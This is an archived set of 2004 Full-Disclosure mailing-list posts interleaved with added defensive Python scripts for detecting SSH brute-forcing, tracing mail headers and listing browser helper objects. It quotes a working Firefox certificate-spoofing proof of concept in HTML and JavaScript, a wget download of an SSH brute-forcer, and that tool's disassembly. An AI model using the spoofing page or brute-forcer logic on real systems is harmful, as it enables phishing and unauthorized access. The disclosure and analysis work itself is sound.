I've got a machine and the tools and know how to build the tool. I just need
to be "infected" - wow, 30 variants. That is truly ugly.

Thanks

Michael R. Schmidt

- - - ---------------------------------
thank you
Randall M
 
 



 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Juan Carlos Navea (loconetgmail.com)
Date: Sat Jul 31 2004 - 09:40:45 CDT


Has anyone tried the proof of concept with a real ssl cert and gotten it working?

I just tried it using two different ssl urls and the page only
redirected me to the proper site. I did not see the output generated
by document.writeln even after viewing the source.

Can anyone confirm this? I haven't seen any mention of it on bugzilla either.

I'm using:

0.9.2 on Windows2k

On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <samuelbcgreen.com> wrote:
> Has this been posted to bugilla????
> [...]

--
http://scott.telnetd.com/loco/



 
RE: [Full-Disclosure] FullDisclosure: CWS removal tools

From: Todd Towles (toddtowlesbrookshires.com)
Date: Sat Jul 31 2004 - 11:14:12 CDT


Randall, we have discussed CWShredder. The author stopped supporting his
program and did have a list of every variant on his website and the methods
it used. Very tricky.

He also points out it will not stop the newest version because of the
advanced survival techniques being employed. They are starting to use
rootkit-like methods to hide and rebuild if damaged. CWShredder won't get
the new version and neither will any new program.

As far as malware goes, there is a lot of malware around that is never detected
by AV or Anti-spyware software or anything else for that matter.

Sometimes humans are the best countermeasure.

Todd

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of RandallM
Sent: Saturday, July 31, 2004 9:30 AM
To: full-disclosurelists.netsys.com
Subject: [Full-Disclosure] FullDisclosure: CWS removal tools



 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Aviv Raff (avivragmail.com)
Date: Sat Jul 31 2004 - 10:59:50 CDT


> Has anyone tried the proof of concept with a real ssl cert and get it working?

Yep.
Try here: http://avivra.europe.webmatrixhosting.net/moz/certspoof1.html

> I just tried it using two different ssl urls and the page only redirected me to the
> proper site. I did not see the output generated by document.writeln even after
> viewing the source.

It works just fine with paypal.

> Can anyone confirm this?

Confirmed. Using FireFox 0.9.2 on XP and Win2k3.

> I haven't seen any mention of it on bugzilla either.

It's probably checked as a security issue, therefore it's not public.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Will Beers (whbeersmbio.ncsu.edu)
Date: Sat Jul 31 2004 - 12:00:11 CDT


I got this working on both Windows and Linux versions of Firefox and
Mozilla; it's been submitted and patched.

http://bugzilla.mozilla.org/show_bug.cgi?id=253121

Will Beers

Juan Carlos Navea wrote:
> Has anyone tried the proof of concept with a real ssl cert and get it working?
>
> I just tried it using two different ssl urls and the page only
> redirected me to the proper site. I did not see the output generated
> by document.writeln even after viewing the source.
>
> Can anyone confirm this? I haven't seen any mention of it on bugzilla either.
>
> Im using:
>
> 0.9.2 on Windows2k
>
>
> On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <samuelbcgreen.com> wrote:
>
>>Has this been posted to bugzilla????
>>
>>E.Kellinis wrote:
>>
>>>#########################################
>>>Application: Mozilla Firefox
>>>Vendors: http://www.mozilla.com
>>>Version: 0.9.1 / 0.9.2
>>>Platforms: Windows
>>>Bug: Certificate Spoofing (Phishing)
>>>Risk: High
>>>Exploitation: Remote with browser
>>>Date: 25 July 2004
>>>Author: Emmanouel Kellinis
>>>e-mail: mecipher(dot)org(dot)uk
>>>web: http://www.cipher.org.uk
>>>List : BugTraq(SecurityFocus)/ Full-Disclosure
>>>#########################################
>>>
>>>
>>>=======
>>>Product
>>>=======
>>>A popular Web browser, good alternative to IE and
>>>"The web browser" for linux machines,
>>>used to view pages on the World Wide Web.
>>>
>>>===
>>>Bug
>>>===
>>>
>>>Firefox has a caching problem, as a result of which someone can
>>>spoof a certificate of any website and use it as his/her own.
>>>The problem is exploited using onunload inside < body> and
>>>redirection using Http-equiv Refresh metatag, document.write()
>>>and document.close()
>>>
>>>First you direct the redirection metatag to the website
>>>of which you want to spoof the certificate, then inside
>>>the < body> tag you add an onunload script so you can control
>>>the output inside the webpage with the spoofed certificate.
>>>
>>>After that you say to firefox, as soon as you unload this page
>>>close the stream, apparently the stream you close is
>>>the redirection website, you do that with
>>>document.close().
>>>
>>>Now you can write anything you want, you do that
>>>using document.write(). After writing the content of your choice
>>>you close the stream again, usually firefox won't display your content,
>>>although if you check the source code you see it, so the last thing
>>>is to refresh the new page (do that using window.location.reload()),
>>>after that you have your domain name in the url field, your content
>>>in the browser and the magic yellow Lock on the bottom left corner,
>>>if you pass your mouse over it you will see displayed the name of
>>>the website whose certificate you spoofed, if you double click on it you
>>>will see full information of the certificate without any warning !
>>>
>>>You don't need to have SSL in your website ! it will work with
>>>http.
>>>
>>>Additionally, using this bug malicious websites can bypass content
>>>filtering using SSL properties.
>>>
>>>
>>>=====================
>>>Proof Of Concept Code
>>>=====================
>>>
>>>< HTML>
>>>< HEAD>
>>>< TITLE>Spoofer< /TITLE>
>>>< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
>>>< /HEAD>
>>>< BODY
>>>onunload="
>>>document.close();
>>>document.writeln('< body onload=document.close();break;>
>>> < h3>It is Great to Use example's Cert!');
>>>
>>>document.close();
>>>window.location.reload();
>>>">
>>>< /body>
>>>
>>>
>>>=========================================================
>>>*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
>>>=========================================================
>>
>>--
>>Stephen Samuel +1(604)876-0426 samuelbcgreen.com
>> http://www.bcgreen.com/~samuel/
>> Powerful committed communication. Transformation touching
>> the jewel within each person and bringing it to light.
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Peter Besenbruch (prblava.net)
Date: Sat Jul 31 2004 - 12:59:44 CDT


Stephen Samuel wrote:

> Has this been posted to bugzilla????
>
>
> E.Kellinis wrote:
>
>> #########################################
>> Application: Mozilla Firefox
>> Vendors: http://www.mozilla.com
>> Version: 0.9.1 / 0.9.2
>> Platforms: Windows
>> Bug: Certificate Spoofing (Phishing)
>> Risk: High
>> Exploitation: Remote with browser
>> Date: 25 July 2004
>> Author: Emmanouel Kellinis
>> e-mail: mecipher(dot)org(dot)uk
>> web: http://www.cipher.org.uk
>> List : BugTraq(SecurityFocus)/ Full-Disclosure
>> #########################################

This was fixed by the July 27 builds in both Firefox 0.9.2 (or 1) and
Mozilla 1.7. The Mozilla 1.4 branch was also updated.

Bugzilla report:
http://bugzilla.mozilla.org/show_bug.cgi?id=253121

________________________________________________________________

Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Jan Muenther (jan.muenthernruns.com)
Date: Sat Jul 31 2004 - 13:42:33 CDT


Hey Valdis,

> It's more likely that there's one version, making noise and very rarely finding
> a box with stupid passwords. It's possible there's another rare version that
> tries several stupid passwords and a few old SSH vulnerabilities. Is there
> *any* reliable evidence (even a single box) that appears to have been nailed by
> a new exploit?

Hm, as for this frauder binary, I have my strong doubts... looked at it, and
it's a plain brute forcer / banner grabber which is statically linked against
SSH-2.0-libssh-0.1. No magic visible, at least not in the given timeframe, and
my gut feeling is that that's it.

>
> I'll gladly change my mind, but it will take somebody actually finding a
> box running a *recent* SSH and had guest/test/and_so_on properly secured,
> and the attack *still* got in....

I assume in the aforementioned takeovers other factors were involved.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Jan Muenther (jan.muenthernruns.com)
Date: Sat Jul 31 2004 - 13:36:39 CDT


Hi there,

> Agreed. The thing *is* publicly available, just do 'wget
> frauder.us/linux/ssh.tgz'. What kept me from disassembling the thing so
> far is not availability, but lacking knowledge about the ssh protocol on
> my side ;-)

Hm, actually, there's fairly little of that required to see what this beast
does...
Guys, I can't help but sing the praise of IDA Pro. Get it, it's worth the
money.

> The tool itself dos not need root rights. What needs to be root is the
> portscanner accompanying it.

Yeah, found that too. That, however, is not surprising. It's a SYN scanner,
using a detached scanning method, built on libnet (eh, too lazy for raw sockets,
are we) and libpcap, and it's statically linked against them. Both binaries
were not stripped, by the way :>

You'll need root rights for constructing packets with libnet and root rights
to set the interface into promiscuous mode for the pcap captures.

>
> hehe. According to a brief look at the strace of this thingy, it does
> not do anything suspicious on the local box. But maybe I should have a
> second look - who knows?

Mkay, it really appears to be just an SSH scanner / bruteforcer, which next
to the hardcoded username / password combinations also tries the identity /
public key files of the current user to access other boxes.

Some stuff from the disassembly (label names are mine, function names are from
the binary, as I said, not stripped).

So, it first tries to open uniq.txt for its input, nothing new, and bails out
if it can't:

.text:080482E3 push offset aR ; "r"
.text:080482E8 push offset aUniq_txt ; "uniq.txt"
.text:080482ED call fopen
.text:080482F2 add esp, 10h
.text:080482F5 mov [ebp+var_C], eax
.text:080482F8 cmp [ebp+var_C], 0
.text:080482FC jnz short loc_8048314
.text:080482FE sub esp, 0Ch
.text:08048301 push offset aNuPotDeschideU ; "nu pot deschide uniq.txt\n"
.text:08048306 call printf

Is this Romanian? Seen it a lot recently...

.text:0804835B do_it: ; CODE XREF: main+86↑j
.text:0804835B call fork
.text:08048360 test eax, eax
.text:08048362 jnz short loc_80483A6
.text:08048364 sub esp, 4
.text:08048367 lea eax, [ebp+var_418]
.text:0804836D push eax
.text:0804836E push offset aTest ; "test"
.text:08048373 push offset aTest ; "test"
.text:08048378 call ccheckauth
.text:0804837D add esp, 10h
.text:08048380 sub esp, 4
.text:08048383 lea eax, [ebp+var_418]
.text:08048389 push eax
.text:0804838A push offset aGuest ; "guest"
.text:0804838F push offset aGuest ; "guest"
.text:08048394 call ccheckauth
.text:08048399 add esp, 10h
.text:0804839C sub esp, 0Ch
.text:0804839F push 0
.text:080483A1 call exit

Mkay, so, it forks and calls a function called ccheckauth(), giving test and
guest as parameters for the username and password variables of that function.
Once that's done, it exits.

So, here's that function:

.text:080481E8 public ccheckauth
.text:080481E8 ccheckauth proc near ; CODE XREF: main+AB↓p
.text:080481E8 ; main+C7↓p
.text:080481E8
.text:080481E8 var_14 = dword ptr -14h
.text:080481E8 var_10 = dword ptr -10h
.text:080481E8 var_C = dword ptr -0Ch
.text:080481E8 var_8 = dword ptr -8
.text:080481E8 var_4 = dword ptr -4
.text:080481E8 arg_0 = dword ptr 8
.text:080481E8 arg_4 = dword ptr 0Ch
.text:080481E8 arg_8 = dword ptr 10h
.text:080481E8
.text:080481E8 push ebp
.text:080481E9 mov ebp, esp
.text:080481EB sub esp, 18h
.text:080481EE mov [ebp+var_C], 1
.text:080481F5 mov [ebp+var_10], offset aNone ; "none"
.text:080481FC sub esp, 0Ch
.text:080481FF push 0Fh
.text:08048201 call alarm
.text:08048206 add esp, 10h
.text:08048209 sub esp, 8
.text:0804820C lea eax, [ebp+var_10]
.text:0804820F push eax
.text:08048210 lea eax, [ebp+var_C]
.text:08048213 push eax
.text:08048214 call ssh_getopt
.text:08048219 add esp, 10h
.text:0804821C mov [ebp+var_8], eax
.text:0804821F sub esp, 8
.text:08048222 push [ebp+arg_0]
.text:08048225 push [ebp+var_8]
.text:08048228 call options_set_username
.text:0804822D add esp, 10h
.text:08048230 sub esp, 8
.text:08048233 push [ebp+arg_8]
.text:08048236 push [ebp+var_8]
.text:08048239 call options_set_host
.text:0804823E add esp, 10h
.text:08048241 sub esp, 0Ch
.text:08048244 push [ebp+var_8]
.text:08048247 call ssh_connect
.text:0804824C add esp, 10h
.text:0804824F mov [ebp+var_4], eax
.text:08048252 cmp [ebp+var_4], 0
.text:08048256 jnz short loc_804825A
.text:08048258 jmp short locret_80482CB
.text:0804825A ; -----------------------------------------------------------------------------

It basically calls a bunch of other functions which do the entire session
setup stuff for the SSH connection attempts. These functions do exactly what
their names imply, so I'll spare you the disassemblies here for brevity's sake.

So, there's nothing spectacular here, it's an SSH bruteforcer. One thing though,
it also uses key auth (determines the current user's home dir and looks for
publickey and id files):

.text:08048B90 trykey: ; CODE XREF: ssh_userauth_autopubkey+F6↓j
.text:08048B90 sub esp, 8
.text:08048B93 lea eax, [ebp+var_10]
.text:08048B96 push eax
.text:08048B97 lea eax, [ebp+var_14]
.text:08048B9A push eax
.text:08048B9B lea eax, [ebp+var_18]
.text:08048B9E push eax
.text:08048B9F push offset keys_path
.text:08048BA4 push offset pub_keys_path
.text:08048BA9 push edi
.text:08048BAA call publickey_from_next_file
.text:08048BAF add esp, 20h
.text:08048BB2 test eax, eax
.text:08048BB4 mov ebx, eax
.text:08048BB6 jz nokeymatch
.text:08048BBC push ebx
.text:08048BBD mov eax, [ebp+var_14]
.text:08048BC0 push eax
.text:08048BC1 push 0
.text:08048BC3 push edi
.text:08048BC4 call ssh_userauth_offer_pubkey
.text:08048BC9 add esp, 10h
.text:08048BCC cmp eax, 0FFFFFFFFh
.text:08048BCF jz cleanupkey
.text:08048BD5 test eax, eax
.text:08048BD7 jnz pubrefused
.text:08048BDD push 0
.text:08048BDF mov eax, [ebp+var_14]
.text:08048BE2 push eax
.text:08048BE3 mov eax, [ebp+var_18]
.text:08048BE6 push eax
.text:08048BE7 push edi
.text:08048BE8 call privatekey_from_file
.text:08048BED add esp, 10h
.text:08048BF0 test eax, eax
.text:08048BF2 mov esi, eax
.text:08048BF4 jz readprivfail
.text:08048BFA push eax
.text:08048BFB push ebx
.text:08048BFC push 0
.text:08048BFE push edi
.text:08048BFF call ssh_userauth_pubkey
.text:08048C04 add esp, 10h
.text:08048C07 cmp eax, 0FFFFFFFFh
.text:08048C0A jz loc_8048CAA
.text:08048C10 test eax, eax
.text:08048C12 jz short auth_success
.text:08048C14 sub esp, 8
.text:08048C17 push offset aWeirdServerAcc ; "Weird : server accepted our public key "...
.text:08048C1C push 0
.text:08048C1E call ssh_say
.text:08048C23 mov [esp+38h+var_38], ebx
.text:08048C26 call free
.text:08048C2B mov [esp+38h+var_38], esi
.text:08048C2E call private_key_free

So, yeah, it's a bruteforcer, nothing magic here.

> Right. And somebody volunteered for this job right now, did you? ;-)

Eh. Limited time, new girlfriend is here and it's weekend :-/
So forgive the incompleteness of this :>
Maybe more on Monday. FWIW, if there are other versions out, they might be
more interesting than this tool.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
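Jan's read of the binary gives a defender something concrete to key on: one source cycling through fixed username/password pairs (test/test, guest/guest) in quick succession, and the same source also offering public keys. What follows is an added example, not code from the thread or from the analysed tool, that flags such sources in sshd authentication log lines. It assumes OpenSSH's syslog wording for failed logins (both the older "illegal user" and newer "invalid user" forms); the hostnames, addresses, PIDs and timestamps in the sample lines are constructed.

```python
"""Flag SSH password-guessing bursts against the usernames the thread
reports as hardcoded in the scanner (test/test, guest/guest).

Added example; the sample log lines are constructed, not real captures.
"""
import re
from collections import defaultdict
from datetime import datetime

# Usernames the analysed scanner tries, per the disassembly above.
PROBE_USERS = {"test", "guest"}

# OpenSSH failure lines behind a syslog prefix. sshd before 3.9 wrote
# "illegal user", later versions "invalid user"; both are accepted.
FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed (?P<method>password|publickey) for (?:(?:invalid|illegal) user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_failure(line, year=2004):
    """Return a dict for an sshd authentication failure, or None for any other
    line. Syslog timestamps carry no year, so the caller supplies it."""
    m = FAIL_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "method": m["method"], "user": m["user"], "ip": m["ip"]}


def find_probe_sources(lines, window_s=60, min_attempts=2):
    """Return {ip: summary} for sources that hit a probe username at least
    min_attempts times inside window_s seconds. All failures from such a
    source are summarised so key-based attempts show up alongside."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_failure(line)
        if ev is not None:
            by_ip[ev["ip"]].append(ev)

    hits = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        probes = [e for e in events if e["user"] in PROBE_USERS]
        # Sliding window over the probe-username attempts only.
        for i in range(len(probes)):
            j = i
            while (j + 1 < len(probes)
                   and (probes[j + 1]["ts"] - probes[i]["ts"]).total_seconds() <= window_s):
                j += 1
            if j - i + 1 >= min_attempts:
                hits[ip] = {
                    "probe_attempts": j - i + 1,
                    "users": sorted({e["user"] for e in probes[i:j + 1]}),
                    "methods": sorted({e["method"] for e in events}),
                    "first_seen": events[0]["ts"],
                }
                break
    return hits


# Constructed sample auth.log lines (host, IPs, PIDs and times are made up).
SAMPLE_LOG = [
    "Jul 31 13:36:40 bastion sshd[2041]: Failed password for invalid user test from 192.0.2.10 port 40212 ssh2",
    "Jul 31 13:36:41 bastion sshd[2043]: Failed password for guest from 192.0.2.10 port 40213 ssh2",
    "Jul 31 13:36:42 bastion sshd[2045]: Failed publickey for root from 192.0.2.10 port 40214 ssh2",
    "Jul 31 13:40:02 bastion sshd[2101]: Failed password for alice from 198.51.100.7 port 51022 ssh2",
    "Jul 31 13:40:05 bastion sshd[2101]: Accepted password for alice from 198.51.100.7 port 51022 ssh2",
]

if __name__ == "__main__":
    for ip, summary in find_probe_sources(SAMPLE_LOG).items():
        print(ip, summary)
```

Keying on the probe usernames rather than on raw failure counts keeps a real user's mistyped password from tripping the rule, and the methods field records whether the same source also tried key authentication, which is what Jan's disassembly shows this scanner doing after its password pairs. Feed it /var/log/auth.log (or secure) lines and adjust the window and threshold to the traffic you see.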


 
RE: [Full-Disclosure] Re:

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 01:28:13 CDT


This guy has been sending out viruses, unknown to him; his machine has been infected... can someone please notify the admin / user of this machine or someone with enough clue to remove this virus for him (I would gladly help him / her if the user was online and was going to trust me, but I highly doubt that),

here are the full headers of the mail....

Return-Path: <full-disclosure-adminlists.netsys.com>
X-Flags: 0000
Delivered-To: nobody.......com
Received: (qmail 8562 invoked by uid 65534); 30 Jul 2004 00:25:28 -0000
X-Priority: 3
X-MSMail-Priority: Normal
Received: from NETSYS.COM (EHLO netsys.com) (199.201.233.10) by mx0.gmx.net (mx060) with SMTP; 30 Jul 2004 02:25:28 +0200
Received: from NETSYS.COM (localhost [127.0.0.1]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with ESMTP id i6TN67806512; Thu, 29 Jul 2004 19:06:07 -0400 (EDT)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Received: from arsenio-casa.com ([200.55.20.89]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with SMTP id i6TN1vj05534 for <full-disclosurelists.netsys.com>; Thu, 29 Jul 2004 19:01:59 -0400 (EDT)
To: "Full-disclosure" <full-disclosurelists.netsys.com>
From: <3APA3ASECURITY.NNOV.RU>
Message-ID: <puicynacljmcxfkwqldlists.netsys.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_NextPart_000_04A2_01C476E1.6A1C8670"
Subject: [Full-Disclosure] Re:
Sender: <full-disclosure-adminlists.netsys.com>
Errors-To: full-disclosure-adminlists.netsys.com
X-BeenThere: full-disclosurelists.netsys.com
X-Mailman-Version: 2.0.12
Precedence: bulk
List-Unsubscribe: <http://lists.netsys.com/mailman/listinfo/full-disclosure>,<mailto:full-disclosure-requestlists.netsys.com?subject=unsubscribe>
List-Id: Discussion of security issues <full-disclosure.lists.netsys.com>
List-Post: <mailto:full-disclosurelists.netsys.com>
List-Help: <mailto:full-disclosure-requestlists.netsys.com?subject=help>
List-Subscribe: <http://lists.netsys.com/mailman/listinfo/full-disclosure>,<mailto:full-disclosure-requestlists.netsys.com?subject=subscribe>
List-Archive: <http://lists.netsys.com/pipermail/full-disclosure/>
Date: Thu, 29 Jul 2004 20:01:34 -0300
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: -2 (not scanned, spam filter disabled)

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
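Finding "the admin of this machine" from a header block like the one above means walking the Received: chain backwards to the hop where the message entered the relay path. The following is an added example, not code from the thread; the sample header block reuses the Received: lines posted above (addresses the archive mangled are left out), and the parsing follows RFC 822 header folding and the usual "from <helo> (<name> [<ip>]) by <relay> ...; <date>" shape of a Received clause.

```python
"""Walk the Received: chain of a raw header block, earliest hop first.

Added example. The sample headers are copied from the message quoted above;
the parsing rules are header folding plus the common Received: clause form.
"""
import ipaddress
import re

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
FROM_RE = re.compile(r"^from\s+(?P<helo>\S+)", re.I)


def unfold_headers(raw):
    """Split a raw header block into (name, value) pairs, joining folded
    continuation lines (those starting with whitespace) onto their header."""
    headers = []
    for line in raw.splitlines():
        if not line.strip():
            break                       # blank line ends the header block
        if line[0] in " \t" and headers:
            headers[-1][1] += " " + line.strip()
        else:
            name, _, value = line.partition(":")
            headers.append([name.strip(), value.strip()])
    return [tuple(h) for h in headers]


def received_hops(raw):
    """Return the Received: hops in chronological order. Each MTA prepends
    its own Received: header, so the bottom one is the first hop."""
    received = [v for n, v in unfold_headers(raw) if n.lower() == "received"]
    hops = []
    for value in reversed(received):
        clause, _, rest = value.partition(" by ")
        m = FROM_RE.match(clause)
        ipm = IPV4_RE.search(clause) if m else None
        hops.append({
            "helo": m["helo"] if m else None,            # name the sender announced
            "ip": ipm[1] if ipm else None,               # address the relay observed
            "by": rest.split()[0] if (m and rest) else None,
            "date": value.rsplit(";", 1)[1].strip() if ";" in value else None,
        })
    return hops


def originating_hop(hops):
    """Earliest hop whose observed address is public. Only trust this as far
    as you trust the relay that wrote it: a sender can forge any Received:
    line below the one added by a relay you control."""
    for hop in hops:
        if hop["ip"] and not ipaddress.ip_address(hop["ip"]).is_private:
            return hop
    return None


# Header block taken from the message quoted above (mangled addresses omitted).
SAMPLE_HEADERS = "\n".join([
    "Received: (qmail 8562 invoked by uid 65534); 30 Jul 2004 00:25:28 -0000",
    "X-Priority: 3",
    "Received: from NETSYS.COM (EHLO netsys.com) (199.201.233.10) by mx0.gmx.net (mx060) with SMTP; 30 Jul 2004 02:25:28 +0200",
    "Received: from NETSYS.COM (localhost [127.0.0.1]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with ESMTP id i6TN67806512; Thu, 29 Jul 2004 19:06:07 -0400 (EDT)",
    "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409",
    "Received: from arsenio-casa.com ([200.55.20.89]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with SMTP id i6TN1vj05534; Thu, 29 Jul 2004 19:01:59 -0400 (EDT)",
    "MIME-Version: 1.0",
    "Content-Type: multipart/mixed;",
    '\tboundary="----=_NextPart_000_04A2_01C476E1.6A1C8670"',
    "Subject: [Full-Disclosure] Re:",
    "Date: Thu, 29 Jul 2004 20:01:34 -0300",
    "",
    "body starts here",
])

if __name__ == "__main__":
    for hop in received_hops(SAMPLE_HEADERS):
        print(hop)
    print("origin:", originating_hop(SAMPLE_HEADERS and received_hops(SAMPLE_HEADERS)))
```

Read the chain from the top down to the first relay you trust and take only what that relay recorded: here the list server's own MTA (netsys.com) logged the connection from arsenio-casa.com at 200.55.20.89, which is the address whose owner needs the notification. The hop entries above that one are the list's own delivery path; anything the sender could have placed below it is untrusted.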


 
RE: Re: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:22 CDT


>
> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?

Probably you want regenhancer from the same company that creates Ad-Aware; this does exactly what you want, and nowadays even Ad-Aware has a plugin that does this. Check it out under the plugins category.

But why use a program? Just hunt down the registry key with regedit and you are done, and export the info to a text file ....

-aditya


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
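Aditya's route above is to pull the BHO list straight out of the registry and export it. The following is an added example, not code from the thread or from any tool named in it, that reads such a regedit export (.reg text) of the Browser Helper Objects key together with the CLSID subtree and pairs each registered BHO with the DLL its InprocServer32 key names; the sample export, its CLSIDs, names and DLL path are constructed.

```python
r"""List Internet Explorer Browser Helper Objects from a regedit export.

Added example. Input is the text of a .reg file exported from
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
plus the CLSID subtree (HKCR\CLSID or HKLM\SOFTWARE\Classes\CLSID) that maps
each BHO CLSID to the DLL IE will load.
"""
import re

BHO_KEY_RE = re.compile(
    r"^HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\"
    r"Browser Helper Objects\\(\{[0-9A-F-]{36}\})$", re.I)
INPROC_KEY_RE = re.compile(
    r"^(?:HKEY_CLASSES_ROOT|HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes)\\CLSID\\"
    r"(\{[0-9A-F-]{36}\})\\InprocServer32$", re.I)
VALUE_RE = re.compile(r'^(?:@|"(?P<name>[^"]*)")=(?P<data>.*)$')


def _unescape(s):
    """Undo .reg string escaping (doubled backslashes, escaped quotes)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1]); i += 2
        else:
            out.append(s[i]); i += 1
    return "".join(out)


def parse_reg(text):
    """Return {key path: {value name: data}}. String data is unescaped; other
    kinds (dword:, hex:) are kept as written. '@' names the default value."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            continue                  # e.g. continuation lines of folded hex data
        name = "@" if m["name"] is None else m["name"]
        data = m["data"]
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def list_bhos(text):
    """Pair every registered BHO CLSID with the DLL its InprocServer32 key names."""
    keys = parse_reg(text)
    dll_by_clsid = {}
    for key, values in keys.items():
        m = INPROC_KEY_RE.match(key)
        if m:
            dll_by_clsid[m[1].upper()] = values.get("@")
    bhos = []
    for key, values in keys.items():
        m = BHO_KEY_RE.match(key)
        if m:
            clsid = m[1].upper()
            bhos.append({"clsid": clsid, "name": values.get("@"),
                         "dll": dll_by_clsid.get(clsid)})
    return bhos


def unresolved(bhos):
    """CLSIDs registered as BHOs with no InprocServer32 path in the export:
    either the CLSID subtree was not exported or the entry is stale. Check
    those by hand before deciding the list is clean."""
    return [b["clsid"] for b in bhos if b["dll"] is None]


# Constructed sample export: CLSIDs, names and the DLL path are made up.
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-2222-3333-4444-555555555555}]",
    '@="Example Helper"',
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}]",
    "",
    r"[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]",
    r'@="C:\\WINDOWS\\system32\\example-helper.dll"',
    r'"ThreadingModel"="Apartment"',
])

if __name__ == "__main__":
    for bho in list_bhos(SAMPLE_REG):
        print(bho)
    print("unresolved:", unresolved(SAMPLE_REG and list_bhos(SAMPLE_REG)))
```

regedit writes exports as UTF-16 with a byte-order mark, so read a real file with `open(path, encoding="utf-16")` before passing the text in. Export both the Browser Helper Objects key and HKCR\CLSID into the same file (or concatenate two exports); a CLSID that shows up as unresolved is worth a manual look, since that is where a hijacker's entry can hide behind a name that looks harmless.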


 
RE: [Full-Disclosure] Automated SSH login attempts?

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:22 CDT


> seems like...' are not exactly results of an analysis.

these small things definitely add up in the final analysis, but we need to be thorough about them, and it certainly needs to be included in the final analysis of the malware

> This things needs to be disassembled, debugged and traced. All
> else is just whistling in the dark.

and write an authoritative analysis about this and post it where all like us can read it...

-aditya


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:21 CDT


>
> Where there are not short-cut workarounds this means removing the
> software manually is simply impossible. Currently a trip into Safe Mode
> can do the trick, by stopping any of the software running, but I'm sure
